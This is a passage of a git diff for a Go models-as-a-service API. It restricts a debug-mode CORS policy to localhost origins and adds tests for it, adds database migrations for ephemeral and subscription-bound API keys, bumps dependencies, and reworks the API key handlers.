+		{name: "loopback range 127.255.255.254", origin: "http://127.255.255.254:9090", want: true},
+
+		{name: "external origin", origin: "https://external.com", want: false},
+		{name: "external with localhost in path", origin: "https://external.com/localhost:3000", want: false},
+		{name: "localhost without scheme", origin: "localhost:3000", want: false},
+		{name: "subdomain of localhost", origin: "http://foo.localhost:3000", want: false},
+		{name: "non-loopback IP", origin: "http://192.168.1.1:8080", want: false},
+		{name: "ftp scheme localhost", origin: "ftp://localhost", want: false},
+		{name: "empty string", origin: "", want: false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			assert.Equal(t, tt.want, isLocalhostOrigin(tt.origin))
+		})
+	}
+}
+
+func newCORSTestRouter(useCORS bool) *gin.Engine {
+	gin.SetMode(gin.TestMode)
+	router := gin.New()
+	if useCORS {
+		router.Use(cors.New(debugCORSConfig()))
+	}
+	router.OPTIONS("/*path", func(c *gin.Context) { c.Status(http.StatusNoContent) })
+	router.GET("/test", func(c *gin.Context) { c.String(http.StatusOK, "ok") })
+	return router
+}
+
+func TestDebugCORS_AllowsLocalhostOrigin(t *testing.T) {
+	router := newCORSTestRouter(true)
+
+	origins := []string{
+		"http://localhost:3000",
+		"https://localhost:8443",
+		"http://127.0.0.1:8080",
+		"https://127.0.0.1:443",
+		"http://localhost",
+		"https://localhost",
+		"http://127.0.0.1",
+		"https://127.0.0.1",
+	}
+
+	for _, origin := range origins {
+		t.Run(origin, func(t *testing.T) {
+			req := httptest.NewRequest(http.MethodGet, "/test", nil)
+			req.Header.Set("Origin", origin)
+			w := httptest.NewRecorder()
+			router.ServeHTTP(w, req)
+
+			assert.Equal(t, http.StatusOK, w.Code)
+			assert.Equal(t, origin, w.Header().Get("Access-Control-Allow-Origin"),
+				"expected CORS to allow localhost origin")
+		})
+	}
+}
+
+func TestDebugCORS_RejectsExternalOrigin(t *testing.T) {
+	router := newCORSTestRouter(true)
+
+	origins := []string{
+		"https://external.com",
+		"https://attacker.example.org",
+		"http://not-localhost:3000",
+		"http://192.168.1.1:8080",
+	}
+
+	for _, origin := range origins {
+		t.Run(origin, func(t *testing.T) {
+			req := httptest.NewRequest(http.MethodGet, "/test", nil)
+			req.Header.Set("Origin", origin)
+			w := httptest.NewRecorder()
+			router.ServeHTTP(w, req)
+
+			assert.Equal(t, http.StatusForbidden, w.Code,
+				"cross-origin request from non-localhost should be rejected")
+			assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"),
+				"expected CORS to reject non-localhost origin")
+		})
+	}
+}
+
+func TestDebugCORS_PreflightAllowsLocalhostOrigin(t *testing.T) {
+	router := newCORSTestRouter(true)
+
+	req := httptest.NewRequest(http.MethodOptions, "/test", nil)
+	req.Header.Set("Origin", "http://localhost:3000")
+	req.Header.Set("Access-Control-Request-Method", "POST")
+	req.Header.Set("Access-Control-Request-Headers", "Authorization")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	assert.Equal(t, http.StatusNoContent, w.Code)
+	assert.Equal(t, "http://localhost:3000", w.Header().Get("Access-Control-Allow-Origin"))
+	assert.Contains(t, w.Header().Get("Access-Control-Allow-Methods"), "POST")
+	assert.Contains(t, w.Header().Get("Access-Control-Allow-Headers"), "Authorization")
+}
+
+func TestDebugCORS_PreflightRejectsExternalOrigin(t *testing.T) {
+	router := newCORSTestRouter(true)
+
+	req := httptest.NewRequest(http.MethodOptions, "/test", nil)
+	req.Header.Set("Origin", "https://external.com")
+	req.Header.Set("Access-Control-Request-Method", "POST")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"),
+		"preflight should not return CORS headers for external origin")
+}
+
+func TestDebugCORS_CredentialsNotAllowed(t *testing.T) {
+	router := newCORSTestRouter(true)
+
+	req := httptest.NewRequest(http.MethodGet, "/test", nil)
+	req.Header.Set("Origin", "http://localhost:3000")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	assert.Empty(t, w.Header().Get("Access-Control-Allow-Credentials"),
+		"credentials should not be allowed — API uses Bearer tokens, not cookies")
+}
+
+func TestDebugCORS_SameOriginRequestPassesThrough(t *testing.T) {
+	router := newCORSTestRouter(true)
+
+	req := httptest.NewRequest(http.MethodGet, "/test", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	assert.Equal(t, http.StatusOK, w.Code,
+		"same-origin request (no Origin header) must not be blocked by CORS middleware")
+	assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"),
+		"no CORS headers expected for same-origin request")
+}
+
+func TestNoCORS_WhenDebugModeDisabled(t *testing.T) {
+	router := newCORSTestRouter(false)
+
+	req := httptest.NewRequest(http.MethodGet, "/test", nil)
+	req.Header.Set("Origin", "http://localhost:3000")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	assert.Equal(t, http.StatusOK, w.Code)
+	assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"),
+		"CORS headers should not be present when debug mode is off")
+}
diff --git a/maas-api/cmd/main.go b/maas-api/cmd/main.go
index be0ca22ca..466c26b43 100644
--- a/maas-api/cmd/main.go
+++ b/maas-api/cmd/main.go
@@ -5,7 +5,9 @@ import (
 	"errors"
 	"flag"
 	"fmt"
+	"net"
 	"net/http"
+	"net/url"
 	"os"
 	"os/signal"
 	"syscall"
@@ -50,7 +52,7 @@ func serve() error {
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
 
-	cluster, err := config.NewClusterConfig(cfg.Namespace, constant.DefaultResyncPeriod)
+	cluster, err := config.NewClusterConfig(cfg.Namespace, cfg.MaaSSubscriptionNamespace, constant.DefaultResyncPeriod)
 	if err != nil {
 		return fmt.Errorf("failed to create cluster config: %w", err)
 	}
@@ -72,16 +74,8 @@ func serve() error {
 
 	router := gin.Default()
 	if cfg.DebugMode {
-		router.Use(cors.New(cors.Config{
-			AllowMethods:  []string{"GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS"},
-			AllowHeaders:  []string{"Authorization", "Content-Type", "Accept"},
-			ExposeHeaders: []string{"Content-Type"},
-			AllowOriginFunc: func(origin string) bool {
-				return true
-			},
-			AllowCredentials: true,
-			MaxAge:           12 * time.Hour,
-		}))
+		log.Warn("Debug CORS policy active: allowing localhost origins only")
+		router.Use(cors.New(debugCORSConfig()))
 	}
 
 	router.OPTIONS("/*path", func(c *gin.Context) { c.Status(204) })
@@ -157,7 +151,6 @@ func registerHandlers(ctx context.Context, log *logger.Logger, router *gin.Engin
 	v1Routes.POST("/tiers/lookup", tier.NewHandler(tierMapper).TierLookup)
 
 	subscriptionSelector := subscription.NewSelector(log, cluster.MaaSSubscriptionLister)
-	v1Routes.POST("/subscriptions/select", subscription.NewHandler(log, subscriptionSelector).SelectSubscription)
 
 	modelManager, err := models.NewManager(log)
 	if err != nil {
@@ -165,14 +158,18 @@ func registerHandlers(ctx context.Context, log *logger.Logger, router *gin.Engin
 	}
 
 	tokenHandler := token.NewHandler(log, cfg.Name)
+	modelsHandler := handlers.NewModelsHandler(log, modelManager, subscriptionSelector, cluster.MaaSModelRefLister)
+	subscriptionHandler := subscription.NewHandler(log, subscriptionSelector)
 
-	modelsHandler := handlers.NewModelsHandler(log, modelManager, subscriptionSelector, cluster.MaaSModelRefLister, cfg.Namespace)
-
-	apiKeyService := api_keys.NewServiceWithLogger(store, cfg, log)
+	apiKeyService := api_keys.NewServiceWithLogger(store, cfg, subscriptionSelector, log)
 	apiKeyHandler := api_keys.NewHandler(log, apiKeyService, cluster.AdminChecker)
 
 	v1Routes.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
 
+	// Subscription listing routes
+	v1Routes.GET("/subscriptions", tokenHandler.ExtractUserInfo(), subscriptionHandler.ListSubscriptions)
+	v1Routes.GET("/model/:model-id/subscriptions", tokenHandler.ExtractUserInfo(), subscriptionHandler.ListSubscriptionsForModel)
+
 	// API Key routes - Complete CRUD for hash-based key architecture
 	apiKeyRoutes := v1Routes.Group("/api-keys", tokenHandler.ExtractUserInfo())
 	apiKeyRoutes.POST("", apiKeyHandler.CreateAPIKey)                  // Create hash-based key
@@ -184,6 +181,36 @@ func registerHandlers(ctx context.Context, log *logger.Logger, router *gin.Engin
 	// Internal routes for Authorino HTTP callback (no auth required - called by Authorino)
 	internalRoutes := router.Group("/internal/v1")
 	internalRoutes.POST("/api-keys/validate", apiKeyHandler.ValidateAPIKeyHandler)
+	internalRoutes.POST("/subscriptions/select", subscriptionHandler.SelectSubscription)
 
 	return nil
 }
+
+// isLocalhostOrigin reports whether the origin is a localhost address,
+// used by the debug-mode CORS policy to restrict cross-origin access to
+// local development only. Accepts both ported (http://localhost:3000)
+// and default-port (http://localhost) forms.
+func isLocalhostOrigin(origin string) bool {
+	u, err := url.Parse(origin)
+	if err != nil {
+		return false
+	}
+	if u.Scheme != "http" && u.Scheme != "https" {
+		return false
+	}
+	if u.Hostname() == "localhost" {
+		return true
+	}
+	ip := net.ParseIP(u.Hostname())
+	return ip != nil && ip.IsLoopback()
+}
+
+func debugCORSConfig() cors.Config {
+	return cors.Config{
+		AllowMethods:    []string{"GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS"},
+		AllowHeaders:    []string{"Authorization", "Content-Type", "Accept"},
+		ExposeHeaders:   []string{"Content-Type"},
+		AllowOriginFunc: isLocalhostOrigin,
+		MaxAge:          12 * time.Hour,
+	}
+}
diff --git a/maas-api/db/schema/0002_add_ephemeral_column.up.sql b/maas-api/db/schema/0002_add_ephemeral_column.up.sql
new file mode 100644
index 000000000..32f07031d
--- /dev/null
+++ b/maas-api/db/schema/0002_add_ephemeral_column.up.sql
@@ -0,0 +1,12 @@
+-- Schema for API Key Management: 0002_add_ephemeral_column.up.sql
+-- Description: Add ephemeral column for short-lived programmatic keys
+
+-- Add ephemeral column to api_keys table (idempotent)
+ALTER TABLE api_keys ADD COLUMN IF NOT EXISTS ephemeral BOOLEAN NOT NULL DEFAULT FALSE;
+
+-- Index for cleanup job: find expired ephemeral keys efficiently
+-- Partial index only includes ephemeral keys to minimize index size
+-- Note: ephemeral column excluded from index key since WHERE clause already filters it
+CREATE INDEX IF NOT EXISTS idx_api_keys_ephemeral_expired 
+ON api_keys(status, expires_at) 
+WHERE ephemeral = TRUE;
diff --git a/maas-api/db/schema/0003_add_subscription_column.up.sql b/maas-api/db/schema/0003_add_subscription_column.up.sql
new file mode 100644
index 000000000..0bf4b21a0
--- /dev/null
+++ b/maas-api/db/schema/0003_add_subscription_column.up.sql
@@ -0,0 +1,5 @@
+-- Schema for API Key Management: 0003_add_subscription_column.up.sql
+-- Description: Add subscription column — binds each API key to a MaaSSubscription name at mint time
+
+-- Add subscription column (idempotent). Value is MaaSSubscription metadata.name, resolved when the key is created.
+ALTER TABLE api_keys ADD COLUMN IF NOT EXISTS subscription TEXT NOT NULL;
diff --git a/maas-api/go.mod b/maas-api/go.mod
index 12dea2f7c..943d369eb 100644
--- a/maas-api/go.mod
+++ b/maas-api/go.mod
@@ -107,15 +107,15 @@ require (
 	github.com/ugorji/go/codec v1.3.0 // indirect
 	github.com/x448/float16 v0.8.4 // indirect
 	github.com/zeebo/errs v1.4.0 // indirect
-	go.opentelemetry.io/auto/sdk v1.1.0 // indirect
+	go.opentelemetry.io/auto/sdk v1.2.1 // indirect
 	go.opentelemetry.io/contrib/detectors/gcp v1.36.0 // indirect
 	go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.61.0 // indirect
 	go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 // indirect
-	go.opentelemetry.io/otel v1.37.0 // indirect
-	go.opentelemetry.io/otel/metric v1.37.0 // indirect
-	go.opentelemetry.io/otel/sdk v1.37.0 // indirect
-	go.opentelemetry.io/otel/sdk/metric v1.37.0 // indirect
-	go.opentelemetry.io/otel/trace v1.37.0 // indirect
+	go.opentelemetry.io/otel v1.40.0 // indirect
+	go.opentelemetry.io/otel/metric v1.40.0 // indirect
+	go.opentelemetry.io/otel/sdk v1.40.0 // indirect
+	go.opentelemetry.io/otel/sdk/metric v1.40.0 // indirect
+	go.opentelemetry.io/otel/trace v1.40.0 // indirect
 	go.uber.org/multierr v1.11.0 // indirect
 	go.yaml.in/yaml/v2 v2.4.2 // indirect
 	go.yaml.in/yaml/v3 v3.0.4 // indirect
@@ -123,7 +123,7 @@ require (
 	golang.org/x/crypto v0.45.0 // indirect
 	golang.org/x/net v0.47.0 // indirect
 	golang.org/x/oauth2 v0.30.0 // indirect
-	golang.org/x/sys v0.38.0 // indirect
+	golang.org/x/sys v0.40.0 // indirect
 	golang.org/x/term v0.37.0 // indirect
 	golang.org/x/text v0.31.0 // indirect
 	golang.org/x/time v0.12.0 // indirect
diff --git a/maas-api/go.sum b/maas-api/go.sum
index ba857823b..01aec43cf 100644
--- a/maas-api/go.sum
+++ b/maas-api/go.sum
@@ -290,8 +290,8 @@ github.com/prometheus/common v0.66.1 h1:h5E0h5/Y8niHc5DlaLlWLArTQI7tMrsfQjHV+d9Z
 github.com/prometheus/common v0.66.1/go.mod h1:gcaUsgf3KfRSwHY4dIMXLPV0K/Wg1oZ8+SbZk/HH/dA=
 github.com/prometheus/procfs v0.17.0 h1:FuLQ+05u4ZI+SS/w9+BWEM2TXiHKsUQ9TADiRH7DuK0=
 github.com/prometheus/procfs v0.17.0/go.mod h1:oPQLaDAMRbA+u8H5Pbfq+dl3VDAvHxMUOVhe0wYB2zw=
-github.com/rogpeppe/go-internal v1.13.1 h1:KvO1DLK/DRN07sQ1LQKScxyZJuNnedQ5/wKSR38lUII=
-github.com/rogpeppe/go-internal v1.13.1/go.mod h1:uMEvuHeurkdAXX61udpOXGD/AzZDWNMNyH2VO9fmH0o=
+github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ=
+github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc=
 github.com/spf13/pflag v1.0.10 h1:4EBh2KAYBwaONj6b2Ye1GiHfwjqyROoF4RwYO+vPwFk=
 github.com/spf13/pflag v1.0.10/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
 github.com/spiffe/go-spiffe/v2 v2.5.0 h1:N2I01KCUkv1FAjZXJMwh95KK1ZIQLYbPfhaxw8WS0hE=
@@ -330,26 +330,26 @@ github.com/zeebo/errs v1.4.0 h1:XNdoD/RRMKP7HD0UhJnIzUy74ISdGGxURlYG8HSWSfM=
 github.com/zeebo/errs v1.4.0/go.mod h1:sgbWHsvVuTPHcqJJGQ1WhI5KbWlHYz+2+2C/LSEtCw4=
 go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU=
 go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8=
-go.opentelemetry.io/auto/sdk v1.1.0 h1:cH53jehLUN6UFLY71z+NDOiNJqDdPRaXzTel0sJySYA=
-go.opentelemetry.io/auto/sdk v1.1.0/go.mod h1:3wSPjt5PWp2RhlCcmmOial7AvC4DQqZb7a7wCow3W8A=
+go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64=
+go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y=
 go.opentelemetry.io/contrib/detectors/gcp v1.36.0 h1:F7q2tNlCaHY9nMKHR6XH9/qkp8FktLnIcy6jJNyOCQw=
 go.opentelemetry.io/contrib/detectors/gcp v1.36.0/go.mod h1:IbBN8uAIIx734PTonTPxAxnjc2pQTxWNkwfstZ+6H2k=
 go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.61.0 h1:q4XOmH/0opmeuJtPsbFNivyl7bCt7yRBbeEm2sC/XtQ=
 go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.61.0/go.mod h1:snMWehoOh2wsEwnvvwtDyFCxVeDAODenXHtn5vzrKjo=
 go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 h1:Hf9xI/XLML9ElpiHVDNwvqI0hIFlzV8dgIr35kV1kRU=
 go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0/go.mod h1:NfchwuyNoMcZ5MLHwPrODwUF1HWCXWrL31s8gSAdIKY=
-go.opentelemetry.io/otel v1.37.0 h1:9zhNfelUvx0KBfu/gb+ZgeAfAgtWrfHJZcAqFC228wQ=
-go.opentelemetry.io/otel v1.37.0/go.mod h1:ehE/umFRLnuLa/vSccNq9oS1ErUlkkK71gMcN34UG8I=
+go.opentelemetry.io/otel v1.40.0 h1:oA5YeOcpRTXq6NN7frwmwFR0Cn3RhTVZvXsP4duvCms=
+go.opentelemetry.io/otel v1.40.0/go.mod h1:IMb+uXZUKkMXdPddhwAHm6UfOwJyh4ct1ybIlV14J0g=
 go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.36.0 h1:rixTyDGXFxRy1xzhKrotaHy3/KXdPhlWARrCgK+eqUY=
 go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.36.0/go.mod h1:dowW6UsM9MKbJq5JTz2AMVp3/5iW5I/TStsk8S+CfHw=
-go.opentelemetry.io/otel/metric v1.37.0 h1:mvwbQS5m0tbmqML4NqK+e3aDiO02vsf/WgbsdpcPoZE=
-go.opentelemetry.io/otel/metric v1.37.0/go.mod h1:04wGrZurHYKOc+RKeye86GwKiTb9FKm1WHtO+4EVr2E=
-go.opentelemetry.io/otel/sdk v1.37.0 h1:ItB0QUqnjesGRvNcmAcU0LyvkVyGJ2xftD29bWdDvKI=
-go.opentelemetry.io/otel/sdk v1.37.0/go.mod h1:VredYzxUvuo2q3WRcDnKDjbdvmO0sCzOvVAiY+yUkAg=
-go.opentelemetry.io/otel/sdk/metric v1.37.0 h1:90lI228XrB9jCMuSdA0673aubgRobVZFhbjxHHspCPc=
-go.opentelemetry.io/otel/sdk/metric v1.37.0/go.mod h1:cNen4ZWfiD37l5NhS+Keb5RXVWZWpRE+9WyVCpbo5ps=
-go.opentelemetry.io/otel/trace v1.37.0 h1:HLdcFNbRQBE2imdSEgm/kwqmQj1Or1l/7bW6mxVK7z4=
-go.opentelemetry.io/otel/trace v1.37.0/go.mod h1:TlgrlQ+PtQO5XFerSPUYG0JSgGyryXewPGyayAWSBS0=
+go.opentelemetry.io/otel/metric v1.40.0 h1:rcZe317KPftE2rstWIBitCdVp89A2HqjkxR3c11+p9g=
+go.opentelemetry.io/otel/metric v1.40.0/go.mod h1:ib/crwQH7N3r5kfiBZQbwrTge743UDc7DTFVZrrXnqc=
+go.opentelemetry.io/otel/sdk v1.40.0 h1:KHW/jUzgo6wsPh9At46+h4upjtccTmuZCFAc9OJ71f8=
+go.opentelemetry.io/otel/sdk v1.40.0/go.mod h1:Ph7EFdYvxq72Y8Li9q8KebuYUr2KoeyHx0DRMKrYBUE=
+go.opentelemetry.io/otel/sdk/metric v1.40.0 h1:mtmdVqgQkeRxHgRv4qhyJduP3fYJRMX4AtAlbuWdCYw=
+go.opentelemetry.io/otel/sdk/metric v1.40.0/go.mod h1:4Z2bGMf0KSK3uRjlczMOeMhKU2rhUqdWNoKcYrtcBPg=
+go.opentelemetry.io/otel/trace v1.40.0 h1:WA4etStDttCSYuhwvEa8OP8I5EWu24lkOzp+ZYblVjw=
+go.opentelemetry.io/otel/trace v1.40.0/go.mod h1:zeAhriXecNGP/s2SEG3+Y8X9ujcJOTqQ5RgdEJcawiA=
 go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
 go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE=
 go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0=
@@ -420,8 +420,8 @@ golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.1.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.38.0 h1:3yZWxaJjBmCWXqhN1qh02AkOnCQ1poK6oF+a7xWL6Gc=
-golang.org/x/sys v0.38.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
+golang.org/x/sys v0.40.0 h1:DBZZqJ2Rkml6QMQsZywtnjnnGvHza6BTfYFWY9kjEWQ=
+golang.org/x/sys v0.40.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
 golang.org/x/term v0.37.0 h1:8EGAD0qCmHYZg6J17DvsMy9/wJ7/D/4pV/wfnld5lTU=
 golang.org/x/term v0.37.0/go.mod h1:5pB4lxRNYYVZuTLmy8oR2BH8dflOR+IbTYFD8fi3254=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
diff --git a/maas-api/internal/api_keys/handler.go b/maas-api/internal/api_keys/handler.go
index eb570a52c..a80c78550 100644
--- a/maas-api/internal/api_keys/handler.go
+++ b/maas-api/internal/api_keys/handler.go
@@ -1,23 +1,32 @@
 package api_keys
 
 import (
+	"context"
 	"errors"
 	"fmt"
 	"net/http"
-	"strconv"
 	"strings"
 	"time"
 
 	"github.com/gin-gonic/gin"
 
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/token"
 )
 
+// API key creation: single client-visible outcome for subscription resolution failures so we do not
+// distinguish not-found, access denied, or no default subscription (enumeration / permission hints).
+const (
+	apiKeySubscriptionResolutionErrCode = "invalid_subscription"
+	apiKeySubscriptionResolutionErrMsg  = "Unable to resolve a subscription for this API key" //nolint:gosec // G101: public JSON error text, not a credential
+)
+
 // AdminChecker is an interface for checking if a user is an admin.
-// This allows for different implementations (e.g., Auth CR-based, hardcoded, mock for testing).
+// The SARAdminChecker implementation uses Kubernetes SubjectAccessReview
+// to check if the user can create maasauthpolicies (RBAC-based admin detection).
 type AdminChecker interface {
-	IsAdmin(userGroups []string) bool
+	IsAdmin(ctx context.Context, user *token.UserContext) bool
 }
 
 type Handler struct {
@@ -58,144 +67,26 @@ func (h *Handler) getUserContext(c *gin.Context) *token.UserContext {
 	return user
 }
 
-// isAdmin checks if the user has admin privileges based on Auth CR (services.opendatahub.io/v1alpha1).
-// The Auth CR defines adminGroups that are allowed to perform admin operations.
-// Returns true if the user belongs to at least one admin group, false otherwise.
-func (h *Handler) isAdmin(user *token.UserContext) bool {
-	if h == nil || h.adminChecker == nil || user == nil {
+// isAdmin checks if the user has admin privileges via SubjectAccessReview.
+// Admin is determined by RBAC: can user create maasauthpolicies in the configured MaaS namespace?
+// Returns true if the user has admin RBAC permissions, false otherwise.
+func (h *Handler) isAdmin(ctx context.Context, user *token.UserContext) bool {
+	if h == nil || user == nil {
 		return false
 	}
-	return h.adminChecker.IsAdmin(user.Groups)
+	return h.adminChecker.IsAdmin(ctx, user)
 }
 
 // isAuthorizedForKey checks if the user is authorized to access the API key.
 // User is authorized if they own the key or are an admin.
-func (h *Handler) isAuthorizedForKey(user *token.UserContext, keyOwner string) bool {
+func (h *Handler) isAuthorizedForKey(ctx context.Context, user *token.UserContext, keyOwner string) bool {
 	// Check if user owns the key
 	if user.Username == keyOwner {
 		return true
 	}
 
 	// Check if user is admin
-	return h.isAdmin(user)
-}
-
-// parsePaginationParams extracts and validates pagination query parameters.
-func (h *Handler) parsePaginationParams(c *gin.Context) (PaginationParams, error) {
-	const (
-		defaultLimit = 50
-		maxLimit     = 100
-	)
-
-	params := PaginationParams{
-		Limit:  defaultLimit,
-		Offset: 0,
-	}
-
-	// Parse limit
-	if limitStr := c.Query("limit"); limitStr != "" {
-		limit, err := strconv.Atoi(limitStr)
-		if err != nil {
-			return params, errors.New("invalid limit parameter: must be a number")
-		}
-		if limit < 1 {
-			return params, errors.New("invalid limit parameter: must be at least 1")
-		}
-		// Silently cap at maximum (user-friendly)
-		if limit > maxLimit {
-			limit = maxLimit
-		}
-		params.Limit = limit
-	}
-
-	// Parse offset
-	if offsetStr := c.Query("offset"); offsetStr != "" {
-		offset, err := strconv.Atoi(offsetStr)
-		if err != nil {
-			return params, errors.New("invalid offset parameter: must be a number")
-		}
-		if offset < 0 {
-			return params, errors.New("invalid offset parameter: must be non-negative")
-		}
-		params.Offset = offset
-	}
-
-	return params, nil
-}
-
-func (h *Handler) ListAPIKeys(c *gin.Context) {
-	user := h.getUserContext(c)
-	if user == nil {
-		return
-	}
-
-	// Check if user is admin
-	isAdmin := h.isAdmin(user)
-
-	// Parse filter parameters
-	filterUsername := c.Query("username")
-	filterStatus := c.Query("status")
-
-	// Determine target username for filtering
-	var targetUsername string
-	if isAdmin {
-		// Admin behavior: default to ALL users (empty string), or filter if provided
-		targetUsername = filterUsername // Empty string = all users
-	} else {
-		// Regular user behavior: always filter to own keys only
-		if filterUsername != "" && filterUsername != user.Username {
-			c.JSON(http.StatusForbidden, gin.H{
-				"error": "non-admin users can only view their own API keys",
-			})
-			return
-		}
-		targetUsername = user.Username // Always their own username
-	}
-
-	// Parse status filters
-	var statusFilters []string
-	if filterStatus != "" {
-		statusFilters = strings.Split(filterStatus, ",")
-		// Validate each status using allowlist
-		for _, status := range statusFilters {
-			trimmed := strings.TrimSpace(status)
-			if !ValidStatuses[trimmed] {
-				c.JSON(http.StatusBadRequest, gin.H{
-					"error": fmt.Sprintf("invalid status '%s': must be active, revoked, or expired", status),
-				})
-				return
-			}
-		}
-	}
-
-	// Parse pagination parameters
-	params, err := h.parsePaginationParams(c)
-	if err != nil {
-		c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
-		return
-	}
-
-	// Get paginated results with filters
-	result, err := h.service.List(c.Request.Context(), targetUsername, params, statusFilters)
-	if err != nil {
-		h.logger.Error("Failed to list API keys",
-			"error", err,
-			"username", targetUsername,
-			"limit", params.Limit,
-			"offset", params.Offset,
-		)
-		c.JSON(http.StatusInternalServerError, gin.H{"error": "Failed to list api keys"})
-		return
-	}
-
-	// Build response
-	response := ListAPIKeysResponse{
-		Object:  "list",
-		Data:    result.Keys,
-		HasMore: result.HasMore,
-	}
-
-	c.JSON(http.StatusOK, response)
+	return h.isAdmin(ctx, user)
 }
 
 func (h *Handler) GetAPIKey(c *gin.Context) {
@@ -226,7 +117,7 @@ func (h *Handler) GetAPIKey(c *gin.Context) {
 	}
 
 	// Check authorization - user must own the key or be admin
-	if !h.isAuthorizedForKey(user, tok.Username) {
+	if !h.isAuthorizedForKey(c.Request.Context(), user, tok.Username) {
 		h.logger.Warn("Unauthorized API key access attempt",
 			"requestingUser", user.Username,
 			"keyOwner", tok.Username,
@@ -241,17 +132,20 @@ func (h *Handler) GetAPIKey(c *gin.Context) {
 }
 
 // CreateAPIKeyRequest is the request body for creating an API key.
-// Keys can be permanent (no expiresIn) or expiring (with expiresIn).
+// Name is required for regular keys but optional for ephemeral keys.
+// If expiresIn is not provided, defaults to API_KEY_MAX_EXPIRATION_DAYS (or 1hr for ephemeral).
 // Users can only create keys for themselves - the key inherits the user's groups.
 type CreateAPIKeyRequest struct {
-	Name        string          `binding:"required"           json:"name"`
-	Description string          `json:"description,omitempty"`
-	ExpiresIn   *token.Duration `json:"expiresIn,omitempty"` // Optional - nil means permanent
+	Name         string          `json:"name,omitempty"`        // Required for regular keys, optional for ephemeral
+	Description  string          `json:"description,omitempty"`
+	Subscription string          `json:"subscription,omitempty"` // Optional MaaSSubscription name; when omitted, highest-priority accessible subscription is used
+	ExpiresIn    *token.Duration `json:"expiresIn,omitempty"`    // Optional - defaults to API_KEY_MAX_EXPIRATION_DAYS (1hr for ephemeral)
+	Ephemeral    bool            `json:"ephemeral,omitempty"`    // Short-lived programmatic token (default: false)
 }
 
 // CreateAPIKey handles POST /v1/api-keys
 // Creates a new API key (sk-oai-* format) per Feature Refinement.
-// Keys can be permanent (no expiresIn) or expiring (with expiresIn).
+// If expiresIn is not provided, defaults to API_KEY_MAX_EXPIRATION_DAYS (1hr for ephemeral).
 // Per "Keys Shown Only Once": key is returned ONCE at creation and never again.
 // Users can only create keys for themselves - the key inherits the user's groups.
 func (h *Handler) CreateAPIKey(c *gin.Context) {
@@ -266,18 +160,48 @@ func (h *Handler) CreateAPIKey(c *gin.Context) {
 		return
 	}
 
+	// Validate name requirement for non-ephemeral keys
+	if !req.Ephemeral && req.Name == "" {
+		c.JSON(http.StatusBadRequest, gin.H{"error": "name is required for non-ephemeral keys"})
+		return
+	}
+
+	// Auto-generate name for ephemeral keys if not provided
+	name := req.Name
+	if req.Ephemeral && name == "" {
+		name = fmt.Sprintf("ephemeral-%d", time.Now().UnixNano())
+	}
+
 	// Parse expiration duration if provided
 	var expiresIn *time.Duration
 	if req.ExpiresIn != nil {
 		d := req.ExpiresIn.Duration
 		expiresIn = &d
+	} else if req.Ephemeral {
